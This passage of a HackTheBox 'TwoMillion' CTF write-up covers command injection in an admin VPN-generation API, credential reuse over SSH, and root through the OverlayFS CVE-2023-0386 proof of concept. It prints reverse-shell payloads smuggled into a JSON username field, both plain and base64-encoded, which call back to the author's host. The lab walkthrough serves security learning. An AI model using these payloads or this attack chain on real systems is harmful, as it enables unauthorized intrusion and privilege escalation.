<a href="/blog/assets/img/hackthebox/twoMillion/admin_account.png" class="popup img-link shimmer"><img src="/blog/assets/img/hackthebox/twoMillion/admin_account.png" alt="Admin Account" loading="lazy"></a></p>

<h2 id="initial-foothold"><span class="me-2">Initial Foothold</span><a href="#initial-foothold" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>
<p>After now getting that Admin Account I tried to generate the Admin VPN again via <code class="language-plaintext highlighter-rouge">/api/v1/admin/vpn/generate</code>. This now returned a valid <code class="language-plaintext highlighter-rouge">openvpn</code> VPN File.
<a href="/blog/assets/img/hackthebox/twoMillion/VPN_Generate_Admin_SUCCESS.png" class="popup img-link shimmer"><img src="/blog/assets/img/hackthebox/twoMillion/VPN_Generate_Admin_SUCCESS.png" alt="Admin VPN Generate now works" loading="lazy"></a>
Upon closer inspection I noticed that I could now write whatever username/string I wanted into the <code class="language-plaintext highlighter-rouge">username</code> field. So does that mean the Input is not validated?
Turns out yes. Compared to the <code class="language-plaintext highlighter-rouge">/api/v1/user/vpn/generate</code> the admin version of this does not remove special characters.
I tested this step by step and it seems that an OS Command Injection is possible via this Syntax <code class="language-plaintext highlighter-rouge">username;id;</code>.
<a href="/blog/assets/img/hackthebox/twoMillion/command%20injection.png" class="popup img-link shimmer"><img src="/blog/assets/img/hackthebox/twoMillion/command%20injection.png" alt="OS Command Injection" loading="lazy"></a>
With this command Injection we now set up our reverse shell. My first Shell via</p>
<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td><td class="rouge-code"><pre><span class="o">{</span>
	<span class="s2">"username"</span>:<span class="s2">"admin3;sh -i &gt;&amp; /dev/tcp/10.10.14.95/9001 0&gt;&amp;1;"</span>
<span class="o">}</span>
</pre></td></tr></tbody></table></code></div></div>
<p>did not work. So I encoded it inside a base64 string.</p>
<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td><td class="rouge-code"><pre><span class="o">{</span>
	<span class="s2">"username"</span>:<span class="s2">"admin3;echo c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuOTUvOTAwMSAwPiYx | base64 -d | bash;"</span>
<span class="o">}</span>
</pre></td></tr></tbody></table></code></div></div>
<p>This shell now called back to my Host and I successfully got my Shell.
<a href="/blog/assets/img/hackthebox/twoMillion/revShell.png" class="popup img-link shimmer"><img src="/blog/assets/img/hackthebox/twoMillion/revShell.png" alt="Reverse Shell" loading="lazy"></a></p>

<h2 id="privilege-escalation-and-user-flag"><span class="me-2">Privilege Escalation and User Flag</span><a href="#privilege-escalation-and-user-flag" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>
<p>Inside the <code class="language-plaintext highlighter-rouge">/var/www/html</code> location where our shell spawned was a <code class="language-plaintext highlighter-rouge">.env</code> File. This contained the username and password for the <code class="language-plaintext highlighter-rouge">admin</code> user. This is being used inside the <code class="language-plaintext highlighter-rouge">Database.php</code> File to setup the Database connection.
<a href="/blog/assets/img/hackthebox/twoMillion/env-File.png" class="popup img-link shimmer"><img src="/blog/assets/img/hackthebox/twoMillion/env-File.png" alt=".env File" loading="lazy"></a>
I then tested if these Credentials were the same for the SSH Login for the <code class="language-plaintext highlighter-rouge">admin</code> Account. 
<a href="/blog/assets/img/hackthebox/twoMillion/SSHLogin.png" class="popup img-link shimmer"><img src="/blog/assets/img/hackthebox/twoMillion/SSHLogin.png" alt="SSH Login" loading="lazy"></a>
This worked and we also got our User flag right in the <code class="language-plaintext highlighter-rouge">/home/admin</code> directory.
<a href="/blog/assets/img/hackthebox/twoMillion/user%20flag.png" class="popup img-link shimmer"><img src="/blog/assets/img/hackthebox/twoMillion/user%20flag.png" alt="SSH Login" loading="lazy"></a></p>

<h2 id="getting-root"><span class="me-2">Getting Root</span><a href="#getting-root" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>
<p>When logging in via SSH, the MOTD (Message of the Day) displayed “You have mail”. Checking <code class="language-plaintext highlighter-rouge">/var/mail/</code> revealed a message from ch4p@2million.htb to admin@2million.htb, which hinted at an OverlayFS / FUSE vulnerability.
<a href="/blog/assets/img/hackthebox/twoMillion/Mail.png" class="popup img-link shimmer"><img src="/blog/assets/img/hackthebox/twoMillion/Mail.png" alt="You have mail" loading="lazy"></a></p>

<p>Researching a bit about what Vulnerability they could mean with “That one in OverlayFS / FUSE looks nasty” around June 1st 2023.
Based on the timeframe, this strongly pointed to <a href="https://nvd.nist.gov/vuln/detail/cve-2023-0386">CVE-2023-0386</a> which is a high-severity Linux kernel OverlayFS local privilege escalation vulnerability that allows an unprivileged user to exploit a UID mapping bug when copying a setuid file from a nosuid mount to gain unauthorized root privileges on affected systems.
Perfect. With this I then downloaded the Exploit from <a href="https://github.com/sxlmnwb/CVE-2023-0386">sxlmnwb</a> onto my local machine and then copied it over to the HTB Machine via <code class="language-plaintext highlighter-rouge">SCP</code>.</p>
<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>scp <span class="nt">-r</span> ./CVE-2023-0386 admin@10.10.11.221:/home/admin
</pre></td></tr></tbody></table></code></div></div>
<p>After the upload is complete <code class="language-plaintext highlighter-rouge">cd</code> into the directory and <code class="language-plaintext highlighter-rouge">make all</code>. Then as written in the README.md start two terminal Sessions (In our case a new SSH Connection). In the first one then type <code class="language-plaintext highlighter-rouge">./fuse ./ovlcap/lower ./gc</code> which starts the PoC’s custom FUSE filesystem server, using <code class="language-plaintext highlighter-rouge">./ovlcap/lower</code> as the backing “lower” directory and mounting/exposing it at <code class="language-plaintext highlighter-rouge">./gc</code>, so the kernel later “sees” attacker controlled metadata during an OverlayFS copy up. And then in the other terminal run <code class="language-plaintext highlighter-rouge">./exp</code> which runs the actual exploit logic that mounts an OverlayFS setup and triggers a copy up of a crafted privileged file which then pops a root shell :).
<a href="/blog/assets/img/hackthebox/twoMillion/popping%20root.png" class="popup img-link shimmer"><img src="/blog/assets/img/hackthebox/twoMillion/popping%20root.png" alt="Popping Root shell" loading="lazy"></a>. Nicen now we own that System completely. Last step is only to read the root flag under <code class="language-plaintext highlighter-rouge">/root/root.txt</code>
<a href="/blog/assets/img/hackthebox/twoMillion/root%20flag.png" class="popup img-link shimmer"><img src="/blog/assets/img/hackthebox/twoMillion/root%20flag.png" alt="Popping Root shell" loading="lazy"></a></p>

<h2 id="attack-chain--summary"><span class="me-2">Attack Chain / Summary</span><a href="#attack-chain--summary" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>
<p>Attack flow:</p>
<ul>
  <li>Port scan → HTTP identified</li>
  <li>Web enumeration → invite-only registration discovered</li>
  <li>JavaScript analysis → invite API endpoints</li>
  <li>API abuse → invite code generation</li>
  <li>Authenticated API enumeration → admin endpoints found</li>
  <li>Broken authorization → admin account takeover</li>
  <li>VPN generation → OS command injection</li>
  <li>Reverse shell → www-data</li>
  <li>Credential exposure → SSH as admin</li>
  <li>Kernel exploit (OverlayFS / FUSE) → root shell</li>
</ul>

<h2 id="tldr"><span class="me-2">TL;DR</span><a href="#tldr" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>
<blockquote>
  <p>Abused exposed API logic to generate an invite code, escalated to admin via broken authorization checks, achieved command execution through an unsanitized VPN generation endpoint, reused leaked credentials for SSH access, and escalated to root using the OverlayFS (CVE-2023-0386) kernel vulnerability.</p>
</blockquote>

  </div>

  <div class="post-tail-wrapper text-muted">
    <!-- categories -->
    
      <div class="post-meta mb-3">
        <i class="far fa-folder-open fa-fw me-1"></i>
        
          <a href="/blog/categories/ctf/">CTF</a>,
          <a href="/blog/categories/hackthebox/">HackTheBox</a>,
          <a href="/blog/categories/linux/">Linux</a>,
          <a href="/blog/categories/web/">Web</a>,
          <a href="/blog/categories/privilege-escalation/">Privilege Escalation</a>
      </div>
    

    <!-- tags -->
    
      <div class="post-tags">
        <i class="fa fa-tags fa-fw me-1"></i>
        
          <a
            href="/blog/tags/ctf/"
            class="post-tag no-text-decoration"
          >CTF</a>
        
          <a
            href="/blog/tags/writeup/"
            class="post-tag no-text-decoration"
          >writeup</a>
        
          <a
            href="/blog/tags/linux/"
            class="post-tag no-text-decoration"
          >Linux</a>
        
          <a
            href="/blog/tags/htb/"
            class="post-tag no-text-decoration"
          >HTB</a>
        
          <a
            href="/blog/tags/easy/"
            class="post-tag no-text-decoration"
          >Easy</a>
        
          <a
            href="/blog/tags/api/"
            class="post-tag no-text-decoration"
          >API</a>
        
          <a
            href="/blog/tags/command-injection/"
            class="post-tag no-text-decoration"
          >Command Injection</a>
        
          <a
            href="/blog/tags/kernel-exploit/"
            class="post-tag no-text-decoration"
          >Kernel Exploit</a>
        
      </div>
    

    <div
      class="
        post-tail-bottom
        d-flex justify-content-between align-items-center mt-5 pb-2
      "
    >
      <div class="license-wrapper">
        
          

          This post is licensed under 
        <a href="https://creativecommons.org/licenses/by/4.0/">
          CC BY 4.0
        </a>
         by the author.
        
      </div>

      <!-- Post sharing snippet -->

<div class="share-wrapper d-flex align-items-center">
  <span class="share-label text-muted">Share</span>
  <span class="share-icons">
    
    
    

    

    <button
      id="copy-link"
      aria-label="Copy link"
      class="btn small"
      data-bs-toggle="tooltip"
      data-bs-placement="top"
      title="Copy link"
      data-title-succeed="Link copied successfully!"
    >
      <i class="fa-fw fas fa-link pe-none fs-6"></i>
    </button>
  </span>
</div>

    </div>
    <!-- .post-tail-bottom -->
  </div>
  <!-- div.post-tail-wrapper -->
</article>


            
          </main>

          <!-- panel -->
          <aside aria-label="Panel" id="panel-wrapper" class="col-xl-3 ps-2 text-muted">
            <div class="access">
              <!-- Get 5 last posted/updated posts -->














  <section id="access-lastmod">
    <h2 class="panel-heading">Recently Updated</h2>
    <ul class="content list-unstyled ps-0 pb-1 ms-1 mt-2">
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/blog/posts/m0unt41n-fake-weather/">m0unt41n - fake-weather</a>
        </li>
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/blog/posts/m0unt41n-m/">m0unt41n - m</a>
        </li>
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/blog/posts/m0unt41n-whiteboard/">m0unt41n - whiteboard</a>
        </li>
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/blog/posts/m0unt41n-otpam/">m0unt41n - otpam</a>
        </li>
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/blog/posts/hackthebox-TwoMillion/">HackTheBox - TwoMillion</a>
        </li>
      
    </ul>
  </section>
  <!-- #access-lastmod -->


              <!-- The trending tags list -->















  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        



  <section>
    <h2 class="panel-heading">Trending Tags</h2>
    <div class="d-flex flex-wrap mt-3 mb-1 me-3">
      
        
        <a class="post-tag btn btn-outline-primary" href="/blog/tags/ctf/">CTF</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/blog/tags/writeup/">writeup</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/blog/tags/web-security/">web-security</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/blog/tags/picoctf/">picoctf</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/blog/tags/natas/">natas</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/blog/tags/crypto/">crypto</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/blog/tags/python/">python</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/blog/tags/easy/">Easy</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/blog/tags/htb/">HTB</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/blog/tags/linux/">Linux</a>
      
    </div>
  </section>


            </div>

            
              
              






  <div class="toc-border-cover z-3"></div>
  <section id="toc-wrapper" class="invisible position-sticky ps-0 pe-4 pb-4">
    <h2 class="panel-heading ps-3 pb-2 mb-0">Contents</h2>
    <nav id="toc"></nav>
  </section>


            
          </aside>
        </div>

        <div class="row">
          <!-- tail -->
          <div id="tail-wrapper" class="col-12 col-lg-11 col-xl-9 px-md-4">
            
              
              <!-- Recommend the other 3 posts according to the tags and categories of the current post. -->

<!-- The total size of related posts -->


<!-- An random integer that bigger than 0 -->


<!-- Equals to TAG_SCORE / {max_categories_hierarchy} -->















  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
    
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  











  <aside id="related-posts" aria-labelledby="related-label">
    <h3 class="mb-4" id="related-label">Further Reading</h3>
    <nav class="row row-cols-1 row-cols-md-2 row-cols-xl-3 g-4 mb-4">
      
        <article class="col">
          <a href="/blog/posts/hackthebox-Caps/" class="post-preview card h-100">
            <div class="card-body">
              <!--
  Date format snippet
  See: ${JS_ROOT}/modules/components/locale-datetime.js
-->




<time
  
  data-ts="1766138400"
  data-df="ll"
  
>
  Dec 19, 2025
</time>

              <h4 class="pt-0 my-2">HackTheBox - Caps</h4>
              <div class="text-muted">
                <p>Writeup for HackTheBox Machine 'Caps'</p>
              </div>
            </div>
          </a>
        </article>
      
        <article class="col">
          <a href="/blog/posts/natas-solutions16-20/" class="post-preview card h-100">
            <div class="card-body">
              <!--
  Date format snippet
  See: ${JS_ROOT}/modules/components/locale-datetime.js
-->




<time
  
  data-ts="1746439200"
  data-df="ll"
  
>
  May  5, 2025
</time>

              <h4 class="pt-0 my-2">OverTheWire - Natas Solutions 16 - 20</h4>
              <div class="text-muted">
                <p>Solutions and walkthroughs for OverTheWire Natas levels 16–20.</p>
              </div>
            </div>
          </a>
        </article>
      
        <article class="col">
          <a href="/blog/posts/natas-solutions11_15/" class="post-preview card h-100">
            <div class="card-body">
              <!--
  Date format snippet
  See: ${JS_ROOT}/modules/components/locale-datetime.js
-->




<time
  
  data-ts="1745748000"
  data-df="ll"
  
>
  Apr 27, 2025
</time>

              <h4 class="pt-0 my-2">OverTheWire - Natas Solutions 11 - 15</h4>
              <div class="text-muted">
                <p>Solutions and walkthroughs for OverTheWire Natas levels 11–15, focusing on encryption, XOR, known-plaintext attack, and SQL injection.</p>
              </div>
            </div>
          </a>
        </article>
      
    </nav>
  </aside>
  <!-- #related-posts -->


            
              
              <!-- Navigation buttons at the bottom of the post. -->

<nav class="post-navigation d-flex justify-content-between" aria-label="Post Navigation">
  
  

  
    <a
      href="/blog/posts/hackthebox-Caps/"
      class="btn btn-outline-primary"
      aria-label="Older"
    >
      <p>HackTheBox - Caps</p>
    </a>
  

  
    <a
      href="/blog/posts/m0unt41n-whiteboard/"
      class="btn btn-outline-primary"
      aria-label="Newer"
    >
      <p>m0unt41n - whiteboard</p>
    </a>
  
</nav>

            

            <!-- The Footer -->

<footer
  aria-label="Site Info"
  class="
    d-flex flex-column justify-content-center text-muted
    flex-lg-row justify-content-lg-between align-items-lg-center pb-lg-3
  "
>
  <p>©
    <time>2026</time>

    
      <a href="https://github.com/p4wnda">p4wnda</a>.
    

    
      <span
        data-bs-toggle="tooltip"
        data-bs-placement="top"
        title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author."
      >Some rights reserved.</span>
    
  </p>
</footer>

          </div>
        </div>

        <!-- The Search results -->

<div id="search-result-wrapper" class="d-flex justify-content-center d-none">
  <div class="col-11 content">
    <div id="search-hints">
      <!-- The trending tags list -->















  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        



  <section>
    <h2 class="panel-heading">Trending Tags</h2>
    <div class="d-flex flex-wrap mt-3 mb-1 me-3">
      
        
        <a class="post-tag btn btn-outline-primary" href="/blog/tags/ctf/">CTF</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/blog/tags/writeup/">writeup</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/blog/tags/web-security/">web-security</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/blog/tags/picoctf/">picoctf</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/blog/tags/natas/">natas</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/blog/tags/crypto/">crypto</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/blog/tags/python/">python</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/blog/tags/easy/">Easy</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/blog/tags/htb/">HTB</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/blog/tags/linux/">Linux</a>
      
    </div>
  </section>


    </div>
    <div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div>
  </div>
</div>

      </div>

      <aside aria-label="Scroll to Top">
        <button id="back-to-top" type="button" class="btn btn-lg btn-box-shadow">
          <i class="fas fa-angle-up"></i>
        </button>
      </aside>
    </div>

    <div id="mask" class="d-none position-fixed w-100 h-100 z-1"></div>

    
      <aside
  id="notification"
  class="toast"
  role="alert"
  aria-live="assertive"
  aria-atomic="true"
  data-bs-animation="true"
  data-bs-autohide="false"
>
  <div class="toast-header">
    <button
      type="button"
      class="btn-close ms-auto"
      data-bs-dismiss="toast"
      aria-label="Close"
    ></button>
  </div>
  <div class="toast-body text-center pt-0">
    <p class="px-2 mb-3">A new version of content is available.</p>
    <button type="button" class="btn btn-primary" aria-label="Update">
      Update
    </button>
  </div>
</aside>

    

    <!-- Embedded scripts -->

    
      
      <!-- The comments switcher -->


    

    <!--
  Jekyll Simple Search loader
  See: <https://github.com/christian-fei/Simple-Jekyll-Search>
-->





<script>
  
  document.addEventListener('DOMContentLoaded', () => {
    SimpleJekyllSearch({
      searchInput: document.getElementById('search-input'),
      resultsContainer: document.getElementById('search-results'),
      json: '/blog/assets/js/data/search.json',
      searchResultTemplate: '  <article class="px-1 px-sm-2 px-lg-4 px-xl-0">    <header>      <h2><a href="{url}">{title}</a></h2>      <div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1">        {categories}        {tags}      </div>    </header>    <p>{content}</p>  </article>',
      noResultsText: '<p class="mt-5">Oops! No results found.</p>',
      templateMiddleware: function(prop, value, template) {
        if (prop === 'categories') {
          if (value === '') {
            return `${value}`;
          } else {
